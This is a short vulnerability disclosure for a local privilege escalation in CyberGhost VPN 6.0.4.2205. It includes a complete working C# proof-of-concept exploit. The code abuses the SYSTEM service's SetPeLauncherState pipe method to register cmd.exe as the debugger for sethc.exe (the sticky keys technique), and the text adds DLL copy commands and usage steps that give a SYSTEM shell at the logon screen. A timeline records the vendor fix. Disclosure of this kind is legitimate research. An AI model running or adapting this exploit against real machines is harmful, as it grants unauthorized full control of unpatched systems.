CG6Service runs as SYSTEM process.
wmic service where name="CG6Service" get StartName
StartName
LocalSystemEvery process can communicate with this service using pipe.
This service has interesting method SetPeLauncherState which allows launch the debugger automatically for every process we want using HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\currentversion\Image File Execution Options - see MSDN
We can use this method for privilege escalation setting cmd.exe as a debugger to the sethc.exe process - its well known technique called sticky keys.
using System;
using CyberGhost.Communication;
namespace cyber
{
class Program
{
static void Main(string[] args)
{
Console.WriteLine("CyberGhost 6.0.4.2205 Privilege Escalation");
Console.WriteLine("by Kacper Szurek");
Console.WriteLine("http://security.szurek.pl/");
Console.WriteLine("https://twitter.com/KacperSzurek");
PeLauncherOptions options = new PeLauncherOptions();
options.ExecuteableName = "sethc.exe";
options.PeLauncherExecuteable = @"c:\Windows\System32\cmd.exe";
EventSender CyberGhostCom = CyberGhostCom = new EventSender("CyherGhostPipe");
CyberGhostCom.SetPeLauncherState(options, PeLauncherOperation.Add);
Console.WriteLine("Now logout and then press SHIFT key 5 times");
}
}
}Proof of Concept
We need some dependency files before lunching exploit:
copy "c:\Program Files\CyberGhost 6\CyberGhost.Communication.dll" .
copy "c:\Program Files\CyberGhost 6\CyberGhost.VPNServices.dll" .
copy "c:\Program Files\CyberGhost 6\MobileConcepts45.dll" .After successfully exploit execution we need to log out and press Shift key 5 times on the logon screen.
Then cmd.exe is executed as SYSTEM.
Timeline
- 09-01-2017: Discovered
- 09-01-2017: Vendor notified
- 08-02-2017: New version released, issue resolved
